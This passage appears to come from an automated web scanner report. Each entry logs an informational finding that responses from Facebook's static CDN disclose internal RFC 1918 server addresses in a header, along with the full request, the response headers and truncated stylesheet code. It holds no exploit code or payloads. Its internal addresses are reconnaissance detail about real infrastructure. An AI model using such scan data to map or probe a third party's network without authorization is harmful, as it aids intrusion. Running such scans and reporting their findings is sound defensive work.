HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 04 Jul 2011 01:57:04 GMT
X-FB-Server: 10.30.148.192
X-Cnection: close
Vary: Accept-Encoding
Content-Length: 402
Cache-Control: public, max-age=30428292
Expires: Thu, 05 Jul 2012 19:15:45 GMT
Date: Tue, 19 Jul 2011 14:57:33 GMT
Connection: close

/*1309979745,169776320*/

.sp_5xrt5h{background-image:url(http://static.ak.fbcdn.net/rsrc.php/v1/zD/r/hIGTc2UFq5P.png);background-repeat:no-repeat;display:inline-block;height:88px;width:128px}
.sx_dc2
...[SNIP]...

24.66. http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/x_JdY7BNW9-.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yI/r/x_JdY7BNW9-.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.148.192

Request

GET /rsrc.php/v1/yI/r/x_JdY7BNW9-.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 14 Mar 2011 03:25:17 GMT
X-FB-Server: 10.30.148.192
X-Cnection: close
Vary: Accept-Encoding
Content-Length: 356
Cache-Control: public, max-age=28862393
Expires: Sun, 17 Jun 2012 16:18:35 GMT
Date: Tue, 19 Jul 2011 14:58:42 GMT
Connection: close

/*1308413902,169776320*/

.sp_6u9n68{background-image:url(http://static.ak.fbcdn.net/rsrc.php/v1/z6/r/8QMWNfdKd75.png);background-repeat:no-repeat;display:inline-block;height:16px;width:16px}
.sx_641b
...[SNIP]...

24.67. http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/z_rHQCDmDDh.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yI/r/z_rHQCDmDDh.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.146.198

Request

GET /rsrc.php/v1/yI/r/z_rHQCDmDDh.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/facebook
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Tue, 05 Jul 2011 02:24:11 GMT
X-FB-Server: 10.30.146.198
X-Cnection: close
Content-Length: 5394
Vary: Accept-Encoding
Cache-Control: public, max-age=30340216
Expires: Wed, 04 Jul 2012 18:48:05 GMT
Date: Tue, 19 Jul 2011 14:57:49 GMT
Connection: close

/*1309891665,169775814*/

.fbEigenpoll .fbEigenpollCheckbox{cursor:pointer;margin:4px 0 0 5px}
.fbEigenpoll .fbEigenpollCheckbox input{cursor:pointer;margin-left:1px}
.fbEigenpoll .fbEigenpollAddOptio
...[SNIP]...

24.68. http://static.ak.fbcdn.net/rsrc.php/v1/yJ/r/rSJeTgoHNUS.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yJ/r/rSJeTgoHNUS.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.64.185

Request

GET /rsrc.php/v1/yJ/r/rSJeTgoHNUS.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/find-friends?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 11 Jul 2011 02:07:07 GMT
X-FB-Server: 10.138.64.185
Content-Length: 2085
Vary: Accept-Encoding
Cache-Control: public, max-age=30803318
Expires: Tue, 10 Jul 2012 03:26:07 GMT
Date: Tue, 19 Jul 2011 14:57:29 GMT
Connection: close

/*1310354828,176832697*/

.editFriendsHeader{padding:6px 0;margin-bottom:0}
.editFriendsHeader h2 .img{margin-top:2px}
.editFriendsPhonebookHeaderRight,.editFriendsHeaderNewList{margin-right:266px}
.e
...[SNIP]...

24.69. http://static.ak.fbcdn.net/rsrc.php/v1/yK/r/2oTj9mwQeS-.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yK/r/2oTj9mwQeS-.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.147.193

Request

GET /rsrc.php/v1/yK/r/2oTj9mwQeS-.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/find-friends?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 04 Jul 2011 02:19:08 GMT
X-FB-Server: 10.30.147.193
X-Cnection: close
Content-Length: 7448
Vary: Accept-Encoding
Cache-Control: public, max-age=30198271
Expires: Tue, 03 Jul 2012 03:21:59 GMT
Date: Tue, 19 Jul 2011 14:57:28 GMT
Connection: close

/*1309749721,169776065*/

.UINarrowFrame_Container{width:560px;padding:0;overflow:hidden}
.UINarrowFrame_FullWidth{width:600px}
.UINarrowFrame_CenterPage{margin:0 auto}
#ci_module_list{background-colo
...[SNIP]...

24.70. http://static.ak.fbcdn.net/rsrc.php/v1/yK/r/xrEeXUiCo9E.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yK/r/xrEeXUiCo9E.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.69.182

Request

GET /rsrc.php/v1/yK/r/xrEeXUiCo9E.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/facebook
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Sun, 07 Mar 2010 19:11:20 -0800
X-Powered-By: HPHP
X-FB-Server: 10.138.69.182
Vary: Accept-Encoding
Content-Length: 530
Cache-Control: public, max-age=20002358
Expires: Wed, 07 Mar 2012 03:10:35 GMT
Date: Tue, 19 Jul 2011 14:57:57 GMT
Connection: close

/*1299553880,176833974*/

if (window.CavalryLogger) { CavalryLogger.start_js(["uKqhc"]); }

function collect_data_attribs(e,i){var g={};var d={};var h=i.length;var f;for(f=0;f<h;++f){g[i[f]]={};d[i[f]
...[SNIP]...

24.71. http://static.ak.fbcdn.net/rsrc.php/v1/yL/r/Kc1c3lfdICw.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yL/r/Kc1c3lfdICw.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.69.186

Request

GET /rsrc.php/v1/yL/r/Kc1c3lfdICw.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Tue, 12 Jul 2011 04:53:04 GMT
X-FB-Server: 10.138.69.186
Content-Length: 7140
Vary: Accept-Encoding
Cache-Control: public, max-age=30903304
Expires: Wed, 11 Jul 2012 07:13:21 GMT
Date: Tue, 19 Jul 2011 14:58:17 GMT
Connection: close

/*1310454707,176833978*/

table.component_table{padding-left:5px;padding-top:5px}
table.component_table td.icons{width:20px;text-align:center;vertical-align:middle}
table.component_table td.content{wh
...[SNIP]...

24.72. http://static.ak.fbcdn.net/rsrc.php/v1/yL/r/a1RB0wRyoBD.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yL/r/a1RB0wRyoBD.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.16.185

Request

GET /rsrc.php/v1/yL/r/a1RB0wRyoBD.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Wed, 13 Jul 2011 21:02:29 GMT
X-FB-Server: 10.138.16.185
Content-Length: 7762
Vary: Accept-Encoding
Cache-Control: public, max-age=31040045
Expires: Thu, 12 Jul 2012 21:12:44 GMT
Date: Tue, 19 Jul 2011 14:58:39 GMT
Connection: close

/*1310591557,176820409*/

.fbChatOrderedList{position:absolute;bottom:0;left:0;right:0;top:0}
.fbChatOrderedList .item{float:left;width:100%}
.fbChatOrderedList .item a{color:#333;display:block;paddin
...[SNIP]...

24.73. http://static.ak.fbcdn.net/rsrc.php/v1/yM/r/HTDWQBuWGI8.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yM/r/HTDWQBuWGI8.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.147.197

Request

GET /rsrc.php/v1/yM/r/HTDWQBuWGI8.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 04 Jul 2011 02:03:33 GMT
X-FB-Server: 10.30.147.197
X-Cnection: close
Vary: Accept-Encoding
Content-Length: 336
Cache-Control: public, max-age=30201067
Expires: Tue, 03 Jul 2012 04:09:51 GMT
Date: Tue, 19 Jul 2011 14:58:44 GMT
Connection: close

/*1309752509,169776069*/

.sp_26r8dm{background-image:url(http://static.ak.fbcdn.net/rsrc.php/v1/zn/r/uj8P9iaJ2UQ.png);background-repeat:no-repeat;display:inline-block;height:45px;width:24px}
.sx_a42d
...[SNIP]...

24.74. http://static.ak.fbcdn.net/rsrc.php/v1/yN/r/ur_c5XpT6zc.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yN/r/ur_c5XpT6zc.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.147.194

Request

GET /rsrc.php/v1/yN/r/ur_c5XpT6zc.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/find-friends?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 04 Jul 2011 02:34:57 GMT
X-FB-Server: 10.30.147.194
X-Cnection: close
Content-Length: 8050
Vary: Accept-Encoding
Cache-Control: public, max-age=30209240
Expires: Tue, 03 Jul 2012 06:24:49 GMT
Date: Tue, 19 Jul 2011 14:57:29 GMT
Connection: close

/*1309760625,169776066*/

.contact_importer_widget.ci_nateon .nateon_username{width:96px}
.contact_importer_widget.ci_nateon .nateon_domain{width:80px}
#welcome_dashboard li{padding:10px 0 5px 0}
#wel
...[SNIP]...

24.75. http://static.ak.fbcdn.net/rsrc.php/v1/yO/r/O4MC2pFJMzJ.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yO/r/O4MC2pFJMzJ.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.16.184

Request

GET /rsrc.php/v1/yO/r/O4MC2pFJMzJ.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 18 Apr 2011 03:21:50 GMT
X-FB-Server: 10.138.16.184
Vary: Accept-Encoding
Content-Length: 677
Cache-Control: public, max-age=23599923
Expires: Tue, 17 Apr 2012 18:30:45 GMT
Date: Tue, 19 Jul 2011 14:58:42 GMT
Connection: close

/*1303151506,176820408*/

.showOtherMasher:hover{background-color:#edeff4;cursor:pointer}
.showOtherMasher a{display:block;padding-bottom:8px;padding-top:6px}
.showOtherMasher:hover a{text-decoration:
...[SNIP]...

24.76. http://static.ak.fbcdn.net/rsrc.php/v1/yO/r/j6Y0USeru-T.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yO/r/j6Y0USeru-T.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.64.186

Request

GET /rsrc.php/v1/yO/r/j6Y0USeru-T.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 20 Jun 2011 02:24:53 GMT
X-FB-Server: 10.138.64.186
Content-Length: 17207
Vary: Accept-Encoding
Cache-Control: public, max-age=29004111
Expires: Tue, 19 Jun 2012 07:40:32 GMT
Date: Tue, 19 Jul 2011 14:58:41 GMT
Connection: close

/*1308555638,176832698*/

.profile_box .reviews{padding-bottom:15px}
.Reviews_Row{padding-bottom:6px;border-bottom:1px solid #eee;margin-bottom:6px;font-size: 13px;line-height:16px}
.Reviews_Row .Revi
...[SNIP]...

24.77. http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/FnGB7tUxwE3.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yP/r/FnGB7tUxwE3.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.147.195

Request

GET /rsrc.php/v1/yP/r/FnGB7tUxwE3.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Fri, 20 May 2011 02:02:10 GMT
X-FB-Server: 10.30.147.195
X-Cnection: close
Content-Length: 1454
Vary: Accept-Encoding
Cache-Control: public, max-age=29719300
Expires: Wed, 27 Jun 2012 14:20:23 GMT
Date: Tue, 19 Jul 2011 14:58:43 GMT
Connection: close

/*1309270829,169776067*/

.answerText{font-size: 11px;line-height:16px;word-wrap:normal}
.answerText p{padding:0;margin:0}
.answerText blockquote{margin:10px 0;padding:0 0 0 10px;border-left:solid 2px
...[SNIP]...

24.78. http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/aBJXPgldonq.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yP/r/aBJXPgldonq.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.16.183

Request

GET /rsrc.php/v1/yP/r/aBJXPgldonq.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/mobile/?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 11 Jul 2011 02:07:07 GMT
X-FB-Server: 10.138.16.183
Content-Length: 3247
Vary: Accept-Encoding
Cache-Control: public, max-age=30807879
Expires: Tue, 10 Jul 2012 04:42:09 GMT
Date: Tue, 19 Jul 2011 14:57:30 GMT
Connection: close

/*1310359292,176820407*/

.fbMarketingBlock{display:inline-block;vertical-align:top}
.fbMarketingBlock1Column{width:67px}
.fbMarketingBlock2Column{width:150px}
.fbMarketingBlock3Column{width:233px}
.f
...[SNIP]...

24.79. http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/c6emPCFfPcn.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yP/r/c6emPCFfPcn.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.147.197

Request

GET /rsrc.php/v1/yP/r/c6emPCFfPcn.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Tue, 19 Apr 2011 01:56:24 GMT
X-FB-Server: 10.30.147.197
X-Cnection: close
Content-Length: 1175
Vary: Accept-Encoding
Cache-Control: public, max-age=28992811
Expires: Tue, 19 Jun 2012 04:32:16 GMT
Date: Tue, 19 Jul 2011 14:58:45 GMT
Connection: close

/*1308544405,169776069*/

.event_profile .event_upload_image{width:179px}
.event_profile #rsvp_form{display:inline}
.event_profile .event_guestlist .uiHeaderNav{margin-left:0}
.event_profile .event_gu
...[SNIP]...

24.80. http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/hkM0mPGHIE1.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yP/r/hkM0mPGHIE1.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.148.191

Request

GET /rsrc.php/v1/yP/r/hkM0mPGHIE1.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 04 Jul 2011 02:25:52 GMT
X-FB-Server: 10.30.148.191
X-Cnection: close
Vary: Accept-Encoding
Content-Length: 825
Cache-Control: public, max-age=30197295
Expires: Tue, 03 Jul 2012 03:06:59 GMT
Date: Tue, 19 Jul 2011 14:58:44 GMT
Connection: close

/*1309748911,169776319*/

.sp_14cyr8{background-image:url(http://static.ak.fbcdn.net/rsrc.php/v1/zD/r/Y2hvkMjCrcT.png);background-repeat:no-repeat;display:inline-block;height:12px;width:12px}
.sx_cbd1
...[SNIP]...

24.81. http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/9d2D5n1k9ZB.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yQ/r/9d2D5n1k9ZB.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.145.197

Request

GET /rsrc.php/v1/yQ/r/9d2D5n1k9ZB.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/privacy/explanation.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 04 Jul 2011 02:25:52 GMT
X-FB-Server: 10.30.145.197
X-Cnection: close
Content-Length: 1730
Vary: Accept-Encoding
Cache-Control: public, max-age=30931950
Expires: Wed, 11 Jul 2012 15:10:24 GMT
Date: Tue, 19 Jul 2011 14:57:54 GMT
Connection: close

/*1310483520,169775557*/

.sp_1n2jz6{background-image:url(http://static.ak.fbcdn.net/rsrc.php/v1/z1/r/qcTMR8qeslF.png);background-repeat:no-repeat;display:inline-block;height:105px;width:195px}
.sx_e4
...[SNIP]...

24.82. http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/KdKjGooM6-s.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yQ/r/KdKjGooM6-s.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.148.191

Request

GET /rsrc.php/v1/yQ/r/KdKjGooM6-s.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Tue, 19 Apr 2011 01:54:08 GMT
X-FB-Server: 10.30.148.191
X-Cnection: close
Content-Length: 1461
Vary: Accept-Encoding
Cache-Control: public, max-age=29119119
Expires: Wed, 20 Jun 2012 15:37:24 GMT
Date: Tue, 19 Jul 2011 14:58:45 GMT
Connection: close

/*1308670806,169776319*/

.sitetourChat_Header{padding:45px 0 41px;width:977px}
.sitetourChat_Header .sitetourChat_InnerWelcome{color:#203360;display:table-cell;padding:87px 0 0 47px}
.sitetourChat_He
...[SNIP]...

24.83. http://static.ak.fbcdn.net/rsrc.php/v1/yR/r/7mqITnKP1S_.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yR/r/7mqITnKP1S_.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.145.196

Request

GET /rsrc.php/v1/yR/r/7mqITnKP1S_.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/privacy/explanation.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Tue, 19 Apr 2011 01:53:31 GMT
X-FB-Server: 10.30.145.196
X-Cnection: close
Content-Length: 1318
Vary: Accept-Encoding
Cache-Control: public, max-age=23674726
Expires: Wed, 18 Apr 2012 15:16:40 GMT
Date: Tue, 19 Jul 2011 14:57:54 GMT
Connection: close

/*1303226195,169775556*/

.privacy_guide .main_body{background-color:#fff;border:1px solid #ccc;padding:50px;width:700px}
.privacy_guide .title{font-size: 34px;font-weight:normal;padding-bottom:2px}
.
...[SNIP]...

24.84. http://static.ak.fbcdn.net/rsrc.php/v1/yR/r/Sg28aMjfbGK.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yR/r/Sg28aMjfbGK.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.16.184

Request

GET /rsrc.php/v1/yR/r/Sg28aMjfbGK.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/mobile/?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 11 Jul 2011 02:07:07 GMT
X-FB-Server: 10.138.16.184
Content-Length: 3683
Vary: Accept-Encoding
Cache-Control: public, max-age=30831586
Expires: Tue, 10 Jul 2012 11:17:16 GMT
Date: Tue, 19 Jul 2011 14:57:30 GMT
Connection: close

/*1310382928,176820408*/

.MobileHub_More{font-size: 16px;font-weight:bold;padding:10px 10px 0}
.MobileHub_Body{padding:15px 0;width:960px}
.UIPage_LoggedOut .mobile_hub{margin-top:-130px;padding-top:
...[SNIP]...

24.85. http://static.ak.fbcdn.net/rsrc.php/v1/yR/r/bQKCJas2cuT.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yR/r/bQKCJas2cuT.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.147.197

Request

GET /rsrc.php/v1/yR/r/bQKCJas2cuT.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/r.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 06 Jun 2011 02:36:29 GMT
X-FB-Server: 10.30.147.197
X-Cnection: close
Content-Length: 12229
Vary: Accept-Encoding
Cache-Control: public, max-age=27777752
Expires: Tue, 05 Jun 2012 02:59:46 GMT
Date: Tue, 19 Jul 2011 14:57:14 GMT
Connection: close

